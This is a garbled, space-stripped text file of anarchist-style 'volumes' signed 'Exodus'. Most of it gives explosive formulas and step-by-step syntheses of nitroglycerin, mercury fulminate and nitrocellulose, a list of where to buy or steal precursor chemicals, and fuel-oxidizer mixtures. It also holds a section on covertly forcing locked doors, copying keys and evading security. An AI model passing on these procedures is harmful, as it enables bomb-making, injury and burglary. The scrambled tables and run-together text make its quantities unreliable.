ATYOUROWNRISK!!! GuhrDynamite: Ingredients

1partKieselguhr 3partsNitroglycerin

Description Thisdynamiteisprimarilyusedinblasting.Itisfairlystable,inthedrop test,itexplodedbythefallofa1kgweightthrough12to15cm.,orbythe fallofa2kgweightthrough7cm.Thefrozenmaterialislesssensitive:a dropofmorethan20cm.witha1kgweightisneededtoexplodeit,andthe2 kgweightisnecessarytoexplodeit.Frozenorunfrozen,itcanbedetonatedby shootingatitwithamilitaryrifle,whenheldinapapercartridge.Generally, itisdetonatedwithasteelonsteelblow.Velocityofdetonationvaryfrom 6650to6800meterspersecondatadensityloadingof10. ExtraDynamite: FORMULA1 FORMULA2 71%Nitroglycerin 62%AmmoniumNitrate 23%AmmoniumNitrate 25%Nitroglycerin 4%Collodion 12%Charcoal 2%Charcoal 1%Collodion Description: Thismaterialiscrumblyandplasticbetweenthefingers.Thismaterialcanbe detonatedwithanydetonatingcap. TableOfDynamiteFormulae: INGREDIENT STRENGTH 15% 20% 25% 30% 35% Nitroglycerin 15% 20% 25% CombustibleMaterial 20% 19% SodiumNitrate 64% 60% 56% CalciumorMagnesiumCarbonate 1% 1% TableOfMoreDynamiteFormulae: INGREDIENT STRENGTH ORDINARY LOWFREEZING 30% 35% 40% 50% 60% Nitroglycerin 15% 20% 22% NitrosubstitutionCompounds 0% 6% AmmoniumNitrate 15% 15% 20% SodiumNitrate 51% 48% 42% CombustibleMaterial 18% 16% CalciumCarbonateorZincOxide 1% 1% MasterTableOfDynamites: INGREDIENT FORMULA 1 2 3 AmmoniumNitrate 52 0 PotassiumNitrate 21 0 SodiumNitrate 0 24 4 53 0 12 5 60 0 5 6 61 0 3 7 66 0 0 8 73 2.8 0 9 78 5 0 10 83 7 0 11 0 30 0 12 0 34 0 40% 30% 18% 52% 1% 45% 35% 17% 48% 1% 50% 40% 16% 44% 1% 55% 45% 15% 40% 1% 60% 50% 14% 35% 1%

55% 14% 29% 1%

60% 15% 23% 1%

16% 1%

30% 27% 0% 25% 36% 15% 1%

35% 35% 0% 30% 24% 11% 1%

40% 13% 0% 15% 53% 10% 1%

50% 17% 0% 15% 49% 15% 1%

60% 17% 3% 20% 45% 14% 1%

21% 4% 25% 36% 13% 1%

27% 4% 30% 27% 12% 1%

5%

9% 1%

0 0 30

BariumNitrate 0 0 0 NaorKChloride 0 0 0 HydAmmoniumOxalate 16 0 0 AmmoniumChloride 6 0 0 CerealorWoodMeal 0 39 40 Glycerin 0 0 0 SpentTanBarkMeal 0 0 0 PotassiumDichromate 0 5 5 SodiumCarbonate 0 0 0 PowderedCoal 0 0 0 Nitrotoluene 0 0 0 Dinitrotoluene 0 0 0 Trinitrotoluene 0 6 0 Nitroglycerin 5 5 30 Allmeasurementsinpercents

0 21 19 0 4 4 0 0 0 0 6 0 0 4

0 20 0 0 4 0 0 0 0 0 1 0 0 4

0 22 0 0 7 0 0 0 0 4 0 0 0 4

0 15 0 0 2 0 0 0 0 0 0 5 0 3.2

0 8 0 0 1 0 0 0 0 0 0 0 0 4

2 0 0 0 5 0 0 0 0 0 0 0 2 4

4 0 0 0 2 0 0 0 0 0 0 0 25

1 0 0 0 0 0 40 0 0 0 0 0 25

0 0 0 0 38 0 1 0 0 0 0 0 0 25

Well,that'sitfornow...havefun....hehehehehe!USEATYOUROWNRISK!!!! 184.ANARCHY'N'EXPLOSIVESVOLUME5byExodus Well,hasn'titbeenlongsinceVolume4ofAnarchy'n'Explosives?Well,I finallygotaroundtotypingupanothervolume.Thisonewillbededicatedto theextremelysimpleandmoreaccessibleexplosivesandincendiariestobe preparedathome,orlaboratory;dependingupontheenvironmentyouhaveaccess toorareaccustomedto. Forfurtherinformationand/orcommentsonthisseriesofeverpopular explosives,contactme(Idon'tsignthese"publications")ontheKnaveryBBS atxxxxxxxxxxonthepublicmessagebase,Ishouldbereadingsomerequests ifyouleavethem.And,volumenumber6shouldbecomingoutsoonerthanthe timebetween4and5,butdon'tcountonit. BULKPOWDERS: Bulkpowdersaretypesofgunpowderconsistingofnitrocelluloseandamixture ofotherchemicallyexplosivesolutions.Thesenitrocellulosefibersarestuck together,butarenotcompletelycollided.Somecontainlittleelsebut nitrocellulose;otherscontain,inadditiontopotassiumandbariumnitrates, camphor,vaseline,paraffin,lampblack,starch,dextrin,potassiumdichromate orotheroxidizingordeterrentsalts,anddiphenylamineforstabilization,and arecoloredinavarietyofbrillianthuesbymeansofcoltardyes.Three typicalbulkpowdersaremadeupaccordingtotheapproximateformulastabulated below: Nitrocellulose 84.0 %Ninnitrocellulose Potassiumnitrate 7 Bariumnitrate 7 87.0 13.2 6.0 2.0 89.0 12.9 6.0 3.0 12.9

Starch 0.0 Paraffinoil Diphenylamine

0.0 0.0 1.0

1.0 4.0 1.0

0.0 1.0

Themixtureismixedinwarmwateranddriedthoroughly.Theneithergranulated ormadeintopowderbycrushingwithawoodenblockandscreenedthrougha12 meshsieve.Thematerialisthenstoredinamoistureresistantcontainerfor futureorimmediateuse. MERCURYFULMINATE: Mercuryfulminateisaninitiatingexplosive,commonlyappearingaswhiteor graycrystals.Itisextremelysensitivetoinitiationbyheat,friction,spark orflame,andimpact.Itdetonateswheninitiatedbyanyofthesemeans.Itis pressedintocontainers,usuallyat3000psi,foruseindetonatorsandblasting caps.However,whencompressedatgreaterandgreaterpressure(upto30,000 psi),itbecomes"deadpressed."Inthiscondition,itcanonlybedetonatedby anotherinitialdetonatingagent.Mercuryfulminategraduallybecomesinertwhen storedcontinuouslyabove100F.Adarkcoloredproductofdeteriorationgives evidenceofthiseffect.Mercuryexfulminateisstoredunderwaterexceptwhen thereisdangeroffreezing.Thenitisstoredunderamixtureofwaterand alcohol. PreparationofMercuryFulminate.FivegramsofmercuryisaddedExt55cc.of nitricacid(specificgravity1.42)ina100cc.Erlenmeyerflask,andthe mixtureisallowedtostandwithoutshakinguntilthemercuryhasgoneinto solution.Theacidliquidisthenpouredinto50cc.of90%alcoholina500cc. beakerinthehood.Thetemperatureofthemixturerises,avigorousreaction commences,whitefumescomeoff,andcdatabstalsoffulminatesoonbeginto precipitate.Redfumesappearandtheprecipitationofthefulminatebecomes morerapid,thenwhitefumesagainasthereactionmoderates.Afterabout20 minutes,thereactionisover;waterisadded,andthecdatabstalsarewashed withwaterrepeatedlybydecantationuntilthewashingsarenolongeracidto litmus.Theproductconsistsofgrayishyellowcdatabstals,andcorrespondsto agoodgradeofcommercialfulminate.Itmaybeobtainedwhiteandentirelypure bydissolvinginstrongammoniawater,filtering,andreprecipitatingbythe additionof30%aceticacid.Thepurefulminateisfilteredoff,washedseveral timeswithcoldwater,andstoredunderwater,or,ifaverysmallamountis desiredforexperimentalpurposes,itisdriedinadesiccator. AMATOL: Description:amatolisahighexplosive,whitetobuffincolor.Itisamixture ofammoniumnitrateandTNT,witharelativeeffectivenessslightlyhigherthan thatofTNTalone.Commoncompositionsvaryfrom80%ammoniumnitrateand20% TNTto40%ammoniumnitrateand60%TNT.Amatolisusedasthemainbursting chargeinartilleryshellsandbombs.Amatolabsorbsmoistureandcanform dangerouscompoundswithcopperandbrass.Therefore,itshouldnotbehousedin containersofsuchmetals. BLACKPOWDERS: Blackpowdersburneitherquicklyorveryslowlydependingonthecompositionof suchamixture;however,thesepowdersproducesmoke,oftengreatamounts,and ismostusefulinapplicationswheresmokeisnoobject.Itisthebestfor communicatingfireandforproducingaquick,hotflame.Blackpowderisusedin bothpropellantchargesforshrapnelshells,insalutingandblankfirecharges, astheburstingchargeofpracticeshellsandbombs,asapropellingchargein certainpyrotechnicpieces,and,eitherwithorwithouttheadmixtureofother substanceswhichmodifytherateofburning,inthetimetrainringsandin otherpartsoffuses.Belowisalistofblackpowdersandtheircompositions.

Name Saltpeter England 79 England 77.4 Germany 78 Germany 80 France 78 Forte 72 15 Lente 40 30 Ordinaire 62

(Brown)Charcoal (18) 3 (17.6) 5 (19) 3 (20) 0 (19) 3 13 30 18 20

Sulfur

185.ExplosivesandPropellantsbyExodus Almostanycityortownofreasonablesizehasagunstoreandoneormore pharmacies.Thesearetwooftheplacesthatpotentialterroristsvisitinorder topurchaseexplosivematerial.Allthatonehastodoisknowsomethingabout thenonexplosiveusesofthematerials.Blackpowder,forexample,isusedin blackpowderfirearms.Itcomesinvarying"grades",witheachdifferentgrade beingaslightlydifferentsize.Thegradeofblackpowderdependsonwhatthe caliberofthegunthatitisusedin;afinegradeofpowdercouldburntoo fastinthewrongcaliberweapon.Theruleis:thesmallerthegrade,thefaster theburnrateofthepowder. BLACKPOWDER Blackpowderisgenerallyavailableinthreegrades.Asstatedbefore,the smallerthegrade,thefasterthepowderburns.Burnrateisextremelyimportant inbombs.Sinceanexplosionisarapidincreaseofgasvolumeinaconfined environment,tomakeanexplosion,aquickburningpowderisdesirable.The threecommongradesofblackpowderarelistedbelow,alongwiththeusualbore width(caliber)ofwhattheyareusedin.Generally,thefastestburningpowder, theFFFgradeisdesirable.However,theothergradesandusesarelistedbelow: GRADE F FF FFF BOREWIDTH EXAMPLEOFGUN 0orGreater ModelCannon;someRifles .360 LargePistols;SmallRifles .36orSmaller Pistols;Derringers

TheFFFgradeisthefastestburning,becausethesmallergradehasmoresurface areaorburningsurfaceexposedtotheflamefront.Thelargergradesalsohave useswhichwillbediscussedlater.Thepricerangeofblackpowder,perpound, isabout$80$9.00.Thepriceisnotaffectedbythegrade,andsoonesaves oneselftimeandworkifonebuysthefinergradeofpowder.Themajorproblems withblackpowderarethatitcanbeignitedaccidentallybystaticelectricity, andthatithasatendencytoabsorbmoisturefromtheair.Tosafelycrushit, aonewoulduseaplasticspoonandawoodensaladbowl.Takingasmallpileat atime,heorshewouldapplypressuretothepowderthroughthespoonandrub itinaseriesofstrokesorcircles,butnottoohard.Itisfineenoughtouse whenitisaboutasfineasflour.Thefineness,however,isdependentonwhat typeofdeviceonewishestomake;obviously,itwouldbeimpracticaltocrush enoughpowdertofilla1footby4inchradiuspipe.Anyadultcanpurchase blackpowder,sinceanyonecanownblackpowderfirearmsintheUnitedStates. PYRODEX Pyrodexisasyntheticpowderthatisusedlikeblackpowder.Itcomesinthe samegrades,butitismoreexpensiveperpound.However,aonepoundcontainer ofpyrodexcontainsmorematerialbyvolumethanapoundofblackpowder.Itis mucheasiertocrushtoaveryfinepowderthanblackpowder,anditis considerablysaferandmorereliable.Thisisbecauseitwillnotbesetoffby staticelectricity,asblackcanbe,anditislessinclinedtoabsorbmoisture.

Itcostsabout$10.00perpound.Itcanbecrushedinthesamemannerasblack powder,oritcanbedissolvedinboilingwateranddried. ROCKETENGINEPOWDER Oneofthemostexcitinghobbiesnowadaysismodelrocketry.Estesisthe largestproducerofmodelrocketkitsandengines.Rocketenginesarecomposed ofasinglelargegrainofpropellant.Thisgrainissurroundedbyafairly heavycardboardtubing.Onegetsthepropellantbyslittingthetubelength wise,andunwrappingitlikeapapertowelroll.Whenthisisdone,thegray fireclayateitherendofthepropellantgrainmustberemoved.Thisisusually donegentlywithaplasticorbrassknife.Thematerialisexceptionallyhard, andmustbecrushedtobeused.Bygrippingthegraininthewidestsettingona setofpliers,andputtingthegrainandpowderinaplasticbag,thepowder willnotbreakapartandshatterallover.Thisshouldbedonetoallthelarge chunksofpowder,andthenitshouldbecrushedlikeblackpowder.Rocket enginescomeinvarioussizes,rangingfrom1/4A2Ttotheincrediblypowerful Dengines.Thelargertheengine,themoreexpensive.Denginescomeinpackages ofthree,andcostabout$5.00perpackage.Rocketenginesareperhapsthe singlemostusefulitemsoldinstorestoaterrorist,sincetheycanbeusedas is,orcanbecannibalizedfortheirexplosivepowder. RIFLE/SHOTGUNPOWDER Riflepowderandshotgunpowderarereallythesamefromapracticalstandpoint. Theyarebothnitrocellulosebasedpropellants.Theywillbereferredtoas gunpowderinallfuturereferences.Smokelessgunpowderismadebytheactionof concentratednitricandsulfuricaciduponcottonorsomeothercellulose material.Thismaterialisthendissolvedbysolventsandthenreformedinthe desiredgrainsize.Whendealingwithsmokelessgunpowder,thegrainsizeis notnearlyasimportantasthatofblackpowder.Bothlargeandsmallgrained smokelesspowderburnfairlyslowlycomparedtoblackpowderwhenunconfined, butwhenitisconfined,gunpowderburnsbothhotterandwithmoregaseous expansion,producingmorepressure.Therefore,thegrindingprocessthatis oftennecessaryforotherpropellantsisnotnecessaryforsmokelesspowder. Powdercostsabout$9.00perpound.Inmoststatesanycitizenwithavalid driver'slicensecanbuyit,sincetherearecurrentlyfewrestrictionson riflesorshotgunsintheUSTherearenowIDchecksinmanystateswhen purchasingpowderataretailoutlet.Mailordersaren'tsubjecttosuchchecks. Riflepowderandpyrodexmaybepurchasedbymailorder,butUPSchargeswillbe high,duetoDOTregulationsonpackaging. 186.LockpickingIIIbyExodus Ifitbecomesnecessarytopickalocktoenteralab,theworld'smost effectivelockpickisdynamite,followedbyasledgehammer.Thereare unfortunately,problemswithnoiseandexcessstructuraldamagewiththese methods.Thenextbestthing,however,isasetofprofessionallockpicks. These,unfortunately,aredifficulttoacquire.Ifthedoortoalabislocked, butthedeadboltisnotengaged,thenthereareotherpossibilities.Therule hereis:ifonecanseethelatch,onecanopenthedoor.Thereareseveral deviceswhichfacilitatefreeingthelatchfromitsholeinthewall.Dental tools,stiffwire(20gauge),speciallybentaluminumfromcans,thinpocket knives,andcreditcardsarethetoolsofthetrade.Thewaythatallthese toolsanddevicesareusesissimilar:pull,push,orotherwisemovethelatch outofitsrecessinthewall,thusallowingthedoortoopen.Thisisdoneby slidingwhatevertoolthatyouareusingbehindthelatch,andforcingthelatch backintothedoor.

Mostmoderndoorknoblockshavetwofingers.Thelargerfingerholdsthedoor closedwhilethesecond(smaller)fingeronlypreventsthefirstfingerfrom beingpressedinwhenit(thesecondfinger)ispressedinbythecatchplateof thedoor.Ifyoucanseparatethecatchplateandthelocksufficientlyfar,the secondfingerwillslipoutenoughtopermitthefirstfingertobeslipped. (Ill.2.11)___ |}< Small>(|}<Thelarge(first)finger second|___}< finger Somemethodsforgettingthroughlockeddoorsare: 1. Anothermethodofforcedentryistouseanautomobilejacktoforcethe framearoundthedooroutofshape,freeingthelatchorexposingittothe abovemethods.Thisispossiblebecausemostdoorframesaredesignedwitha slightamountof"give".Simplyputthejackintopositionhorizontallyacross theframeinthevicinityofthelatch,andjackitout.Iftheframeiswoodit maybepossibletoremovethejackaftershuttingthedoor,whichwillrelock thedoorandleavefewsignsofforcedentry.Thistechniquewillnotworkin concreteblockbuildings,andit'sdifficulttojustifyanautojacktothe securityguards. 2. Useascrewdriverortwotoprythelockanddoorapart.Whileholding themapart,trytoslipthelock.Screwdrivers,whilenotentirelyinnocent,are muchmoresubtlethanautojacks,andmuchfasteriftheywork.Ifyou'reinto unsubtle,Isupposeacrowbarwouldworktoo,butthenwhybothertoslipthe lockatall? 3. Findasetofdoubledoors.Theyareparticularlyeasytopryapartfar enoughtoslip. 4. Ifthelockisoccasionallyaccessibletoyouwhileopen,"adjust"or replacethecatchplatetomakeitoperatemoresuitably(i.e.,worksothatit letsbothfingersout,sothatitcanalwaysbeslipped).Ifyouwant, disassemblingthelockandremovingsomeofthepinscanmakeitmucheasierto pick. 5. If,forsomeoddreason,thehingesareonyourside(i.e.,thedooropens outward),removethehingepins,providedtheyaren'tstoppedwithweldedtabs. Unfortunately,thistoolackssubtlety,inspiteofitseffectiveness. 6. Ifthedoorcannotbeslippedandyouwillwanttogetthroughregularly, breakthemechanism.Useofsufficientforcetomakethefirstfingerretreat whilethesecondfingerisretreatedwillbreaksomelocks(e.g.,Bestlocks)in suchawaythattheymaythereafterbeslippedtrivially,yetotherwiseworkin allnormalways.Useofahammerand/orscrewdriverisrecommended.Somecare shouldbeusednottodamagethedoorjambwhenattemptingthisonclosedand lockeddoors,soasnottoattracttheattentionoftheusersorownersor locksmithorpoliceexc. 7. Lookaroundindesks.Peopleveryoftenleavekeystosensitivethingsin themorotherobviousplaces.Especiallykeystosharedcriticalresources,like supplyrooms,thataretypicallykeylimitedbutthateveryoneneedsaccessto. Takemeasurementswithamicrometer,ormakeatracing(laykeyunderpaperand scribbleontop),orbedullandmakeawaximpression.Getblanksforthekey type(canbeverydifficultforbetterlocks;Iwon'tgointomethods,other thantosaythatifyoucangetotherkeysmadefromthesameblank,youcan oftenworkwonderswithalittleingenuity)anduseafiletoreproducethekey. Usingamicrometerworksbest:keysmadefrommicmeasurementsaremorelikely toworkconsistentlythankeysmadebyanyothermethod.Ifyouustracings,it islikelytotakemanytriesbeforeyouobtainakeythatworksreliably.Also, ifyoucan'borrow'thecylinderanddisassembleit,pinlevelscanbeobtained andkeysconstructed. 8. Simplelocks,likedesks,canbepickedfairlyeasily.Manydeskshave simplethreeorfourpinlocksofonlyafewlevels,andcanbeconsistently

pickedbyapatientpersoninafewminutes.Asmallscrewdriverandapaper clipwillworkwondersinpracticedhands.Applyaslighttorquetothelockin thedirectionofopeningwiththescrewdriver.Then'rake'thepinswiththe unfoldedpaperclip.Withpractice,you'llapplyenoughpressurewiththe screwdriverthatthepinswillalignproperly(they'llcatchonthecylinder somewherebetweenthetopandbottomoftheirnormaltravel),andoncethey're alllinedup,additionalpressureonthescrewdriverwillthenopenthelock. This,inconjunctionwith(7)canbeveryeffective.Thisworksbetterwith olderorsloppilymachinedlocksthathaveafairamountofplayinthe cylinder.Evenolderqualitylockscanbepickedinthismanner,iftheir cylindershavebeenwornenoughtogiveenoughplaytoallowpinstocatch reliably.Evenwithawellwornqualitylock,though,itgenerallytakesa*lot* ofpatience. 9. Custodialservicesoftenopenupeverythinginsightandthentakebreaks. Makethemostofyouropportunities. 10. Nomatterwhatyou'redoing,looklikeyoubelongthere.Nothingmakes anyonemoresuspiciousthansomeoneskulkingabout,obviouslytryingtolook inconspicuous.Ifthereareseveralofyou,havesomeinnocuousandnormal seemingwarningmethod("Hey,dummy!Whattimeisit?")sothattheycanget anythingsuspiciousputaway.Don'ttravelinlargegroupsat3AM.Remember, morethanonecarthiefhasmanagedtoenlistacop'saidinbreakingintoa car.Rememberthis.Securitypeopleusually*like*tohelppeople.Don'tmake themsuspiciousorannoythem.Ifyoudorunintosecuritypeople,trytomake surethattherewon'tbeanytheftorbreakinsreportedtherethenextday... 11. Considerthepossibilitiesofmasterkeys.Often,everylockinabuilding ordepartmentwillhaveacommonmaster(buildingentrancekeysareacommon exception).Takeapartsomelocksfromdifferentplacesthatshouldhavecommon masters,measurethedifferentpinlengthsineach,andfindlengthsincommon. Experiment.Thengetintothoseplacesyou're*really*curiousabout. 12. Controlkeysarefun,too.Thesekeysallowtheusertoremovethelock's core,andaregenerallymasters.(Apairofneedlenosepliersorsimilartool canthenbeusedtoopenthelock,ifdesired.) SLIPPINGALOCK Thebestmaterialwe'vefoundforslipssofarissoftsheetcopper.Itisquite flexible,soitcanbeworkedintojambseasily,andcanbeprebentasneeded. Intheplaneofthesheet,however,itisfairlystrong,andpullsnicely.Of course,ifthey'reflexibleenough,creditcards,studentIds,etc.,workjust fineonlocksthathavebeenmadeslippableifthedoorjambiswideenough. Wonderfullysubtle,quick,anddelightfullyeffective.Don'tleavehomewithout one. (Ill.#1) ThesheetshouldthenbefoldedtoproduceanL,J,orUshapeddevicethat lookslikethis: ________________________________________ /________________________________________| || ||Lshaped || || |_| (Ill.#2) _____________________________ /___________________________| || ||Jshaped

|| ||________ \________| (Ill.#3) _____________________ /___________________| || || ||Ushaped || ||____________________ \____________________| Wehastentoaddherethatmanyormostcollegesanduniversitieshavevery strictpoliciesaboutunauthorizedpossessionofkeys.Atmost,itisatleast groundsforexpulsion,evenwithoutfilingcriminalcharges.Don'tgetcaught withkeys!!!Thehomemadeonesareparticularlyobvious,astheydon'thavethe usualstampsandmarksthatthelocksmithsputontonameandnumberthekeys.] Weshouldalsopointoutthatifyoumakeanuisanceofyourself,thereare variousnastythingsthatcanbedonetocatchyouand/orslowyoudown.For instance,byputtingspecialpinmechanismsin,lockscanbemadetotrapany keyusedtoopenthem.Ifyouloseonethisway,whatcanIsay?Atleastdon't leavefingerprintsonit.Ormakesurethey'resomeoneelse's.Toomuchmischief canalsotemptthepowersthatbetorekey.

187.ChemicalEquivalentListIIbyExodus Anyonecangetmanychemicalsfromhardwarestores,supermarkets,anddrug storestogetthematerialstomakeexplosivesorotherdangerouscompounds.A wouldbeterroristwouldmerelyneedastationwagonandsomemoneytoacquire manyofthechemicalsnamedhere. Chemical UsedIn Availableat Alcohol,Ethyl AlcoholicBeverages LiquorStores Solvents:95%minforboth HardwareStores Ammonia CLEARHouseholdAmmonia Supermarketsor7Eleven AmmoniumNirate InstantColdPaks DrugStores Fertilizers MedicalSupplyStores NitrousOxide PressurizingWhipCream PartySupplyStores Poppers(likeCOctgs.) HeadShops Magnesium Firestarters SurplusorCampingStores Lecithin Vitamins PharmaciesorDrugStores MineralOil Cooking,Laxative SupermarketorDrugStores Mercury MercuryThermometers Supermarkets HardwareStores SulfuricAcid UnchargedCarBatteries AutomotiveStores Glycerine PharmaciesorDrugStores Sulfur Gardening GardenorHardwareStore Charcoal CharcoalGrills Supermarkets GardeningStores SodiumNitrate Fertilizer GardeningStores Cellulose(Cotton) FirstAid DrugStores MedicalSupplyStores StrontiumNitrate RoadFlares SurplusorAutoStores FuelOil KeroseneStoves SurplusorCampingStores BottledGas PropaneStoves SurplusCampingStores PotassiumPermanganate WaterPurification PurificationPlants

HexamineorMethenamine HexamineStoves SurplusorCampingStores NitricAcid* CleaningPrinting PrintingShops Plates PhotographyStores Iodine+ Disinfectant(tinture) Pharmacy,OSCO SodiumPerchlorate SolidoxPellets HardwareStores CuttingTorches(IMPURE) *Nitricacidisverydifficulttofindnowadays.Itisusuallystolenbybomb makers,ormadebytheprocessdescribedinalatersection.Adesired concentrationformakingexplosivesabout70%. +Theiodinesoldindrugstoresisusuallynotthepurecrystallineformthat isdesiredforproducingammoniumtriiodidecrystals.Toobtainthepureform, itmustusuallybeacquiredbyadoctor'sprescription,butthiscanbe expensive.Onceagain,theftisthemeansthatterroristsresultto. 188.NitroglycerinIIbyExodus Nitroglycerinisoneofthemostsensitiveexplosives,ifitisnotthemost sensitive.Althoughitispossibletomakeitsafely,itisdifficult.Manya younganarchisthasbeenkilledorseriouslyinjuredwhiletryingtomakethe stuff.WhenNobel'sfactoriesmakeit,manypeoplewerekilledbytheallto frequentfactoryexplosions.Usually,assoonasitismade,itisconverted intoasafersubstance,suchasdynamite.Anidiotwhoattemptstomake nitroglycerinwouldusethefollowingprocedure: MATERIAL: DistilledWater TableSalt SodiumBicarbonate ConcentratedNitricAcid(13mL) ConcentratedSulfuricAcid(39mL) Glycerin EQUIPMENT: EyeDropper 100mLBeaker 200300mLBeakers(2) IceBathContainer(Aplasticbucketserveswell) CentigradeThermometer BlueLitmusPaper 1. Place150mLofdistilledwaterintooneofthe200300mLbeakers. 2. Intheother200300mLbeaker,place150mLofdistilledwaterandabout aspoonfulofsodiumbicarbonate,andstirthemuntilthesodiumbicarbonate dissolves.Donotputsomuchsodiumbicarbonateinthewatersothatsome remainsundissolved. 3. Createanicebathbyhalffillingtheicebathcontainerwithice,and addingtablesalt.Thiswillcausetheicetomelt,loweringtheoverall temperature. 4. Placethe100mLbeakerintotheicebath,andpourthe13mLof concentratednitricacidintothe100mLbeaker.Besurethatthebeakerwill notspillintotheicebath,andthattheicebathwillnotoverflowintothe beakerwhenmorematerialsareaddedtoit.Besuretohavealargeenoughice bathcontainertoaddmoreice.Bringthetemperatureoftheaciddowntoabout 20Corless. 5. Whenthenitricacidisascoldasstatedabove,slowlyandcarefullyadd the39mLofconcentratedsulfuricacidtothenitricacid.Mixthetwoacids together,andcoolthemixedacidsto10C.Itisagoodideatostartanother icebathtodothis. 6. Withtheeyedropper,slowlyputtheglycerinintothemixedacids,one

dropatatime.Holdthethermometeralongthetopofthemixturewherethe mixedacidsandglycerinmeet. DONOTALLOWTHETEMPERATURETOGETABOVE30CENTIGRADE IFTHETEMPERATURERISESABOVETHISTEMPERATURE,WATCHOUT!! 7. Theglycerinwillstarttonitrateimmediately,andthetemperaturewill immediatelybegintorise.Addglycerinuntilthereisathinlayerofglycerin ontopofthemixedacids.Itisalwayssafesttomakeanyexplosiveinsmall quantities. 8. Stirthemixedacidsandglycerinforthefirsttenminutesofnitration, addingiceandsalttotheicebathtokeepthetemperatureofthesolutionin the100mLbeakerwellbelow30C.Usually,thenitroglycerinwillformonthe topofthemixedacidsolution,andtheconcentratedsulfuricacidwillabsorb thewaterproducedbythereaction. 9. Whenthereactionisover,andwhenthenitroglyceriniswellbelow30C, slowlyandcarefullypourthesolutionofnitroglycerinandmixedacidintothe distilledwaterinthebeakerinstep1.Thenitroglycerinshouldsettletothe bottomofthebeaker,andthewateracidsolutionontopcanbepouredoffand disposedof.Drainasmuchoftheacidwatersolutionaspossiblewithout disturbingthenitroglycerin. 10. Carefullyremovethenitroglycerinwithacleaneyedropper,andplaceit intothebeakerinstep2.Thesodiumbicarbonatesolutionwilleliminatemuch oftheacid,whichwillmakethenitroglycerinmorestable,andlesslikelyto explodefornoreason,whichitcando.Testthenitroglycerinwiththelitmus paperuntilthelitmusstaysblue.Repeatthisstepifnecessary,andusenew sodiumbicarbonatesolutionsasinstep2. 11. Whenthenitroglycerinisasacidfreeaspossible,storeitinaclean containerinasafeplace.Thebestplacetostorenitroglycerinisfaraway fromanythingliving,orfromanythingofanyvalue.Nitroglycerincanexplode fornoapparentreason,evenifitisstoredinasecurecoolplace.

189.CelluloseNitratebyExodus Iusedtomakenitrocellulose,though.Itwasnotguncottongrade,becauseI didn'thavepetroleum(H2SO4withdissolvedSO3);neverthelessitworked.At firstIgotmyH2SO4fromalittleshopindowntownPhiladelphia,whichsold sodaacidfireextinguisherrefills.Notonlywastheacidconcentrated,cheap andplentiful,itcamewithenoughcarbonatetocleanup.I'daddKNO3anda littlewater(OK,I'daddtheacidtothewaterbuttherewassolittlewater, whatwasaddedtowhatmadelittledifference.ItspatteredconcentratedH2SO4 eitherway).Lateron,whenIcouldpurchasetheacids,IbelieveIused3parts H2SO4to1partHNO3.Forcotton,I'dusecottonwoolorcottoncloth. Runawaynitrationwascommonplace,butitisusuallynotsodisastrouswith nitrocelluloseasitiswithnitroglycerin.Forsomereason,Itriedwashingthe cottonclothinasolutionoflye,andrinsingitwellindistilledwater.Ilet theclothdryandthennitratedit.(DidIreadthissomewhere?)Whenthat productwasnitrated,Inevergotarunawayreaction.Bytheway,waterquenched therunawayreactionofcellulose. Theproductwaswashedthoroughlyandallowedtodry.Itdissolved(orturned intomush)inacetone.Itdissolvedinalcohol/ether. WARNINGS Allusualwarningsregardingstrongacidsapply.H2SO4likestospatter.Whenit fallsontheskin,itdestroystissueoftenpainfully.Itdissolvesallmanner ofclothing.Nitricalsodestroysskin,turningitbrightyellowintheprocess. Nitricisanoxidantitcanstartfires.Bothagentswillhappilyblindyouif yougettheminyoureyes.Otherwarningsalsoapply.Notforthenovice.

Nitrocellulosedecomposesveryslowlyonstorageifitisn'tstabilized.The decompositionisautocatalyzing,andcanresultinspontaneousexplosionifthe materialiskeptconfinedovertime.Theprocessismuchfasterifthematerial isnotwashedwellenough.Nitrocellulosepowderscontainstabilizerssuchas diphenylamineorethylcentralite.DONOTALLOWTHESETOCOMEINTOCONTACTWITH NITRICACID!!!!Asmallamountofeithersubstancewillcapturethesmall amountsofnitrogenoxidesthatresultfromdecomposition.Theytherefore inhibittheautocatalysis.NCeventuallywilldecomposeinanycase. Again,thisisinherentlydangerousandillegalincertainareas.Igotaway withit.Youmaykillyourselfandothersifyoutryit. CommerciallyproducedNitrocelluloseisstabilizedby: 1. Spinningitinalargecentrifugetoremovetheremainingacid,whichis recycled. 2. Immersioninalargequantityoffreshwater. 3. Boilingitinacidulatedwaterandwashingitthoroughlywithfreshwater. IftheNCistobeusedassmokelesspowderitisboiledinasodasolution, thenrinsedinfreshwater. Thepurertheacidused(lowerwatercontent)themorecompletethenitration willbe,andthemorepowerfulthenitrocelluloseproduced. Thereareactuallythreeformsofcellulosenitrate,onlyoneofwhichisuseful forpyrotechnicpurposes.Themononitrateanddinitratearenotexplosive,and areproducedbyincompletenitration.Ifnitrationisallowedtoproceedto completetheexplosivetrinatrateisformed. (Ill.3.22.2) CHOHCHONO |2|22 || COHNOCO /H\3/H\ CHCHO>CHCHO \HH/HSO\HH/ CC24CC |||| OHOHONOONO 22 CELLULOSECELLULOSETRINITRATE 190.StarterExplosivesbyExodus Therearenearlyaninfinitenumberoffueloxidizermixturesthatcanbe producedbyamisguidedindividualinhisownhome.Someareveryeffectiveand dangerous,whileothersaresaferandlesseffective.Alistofworkingfuel oxidizermixtureswillbepresented,buttheexactmeasurementsofeachcompound aredebatableformaximumeffectiveness.Aroughestimatewillbegivenofthe percentagesofeachfuelandoxidizer: Oxidizer %byweight Fuel 67% %byweight Speed Sulfur 33% 5 Sensitive&Unstable Notes FrictionorImpact

PotassiumChlorate

PotassiumChlorate Charcoal PotassiumChlorate

50% 15% 50%

Sugar 35% 5 Unstable Sulfur 25%

FairlySlowBurning 8 ExtremelyUnstable!

Magnesiumor 25% AluminumDust 25% PotassiumChlorate 67% Magnesium AluminumDust 33% SodiumNitrate 65% MagnesiumDust Sulfur 5% PotassiumPermanganate 60% Glycerin dependsuponGrainSize PotassiumPermanganate 67% Sulfur PotassiumPermanganate 60% Sulfur Magnesiumor 20% AluminumDust 20% PotassiumPermanganate 50% Sugar 50% PotassiumNitrate 75% Charcoal 15%

33% 30% 40% 33% 20% 3 7

8 ? 4 5 5

Unstable Unpredictable DelayBeforeIgnition Unstable Unstable

? ThisisBlackPowder!

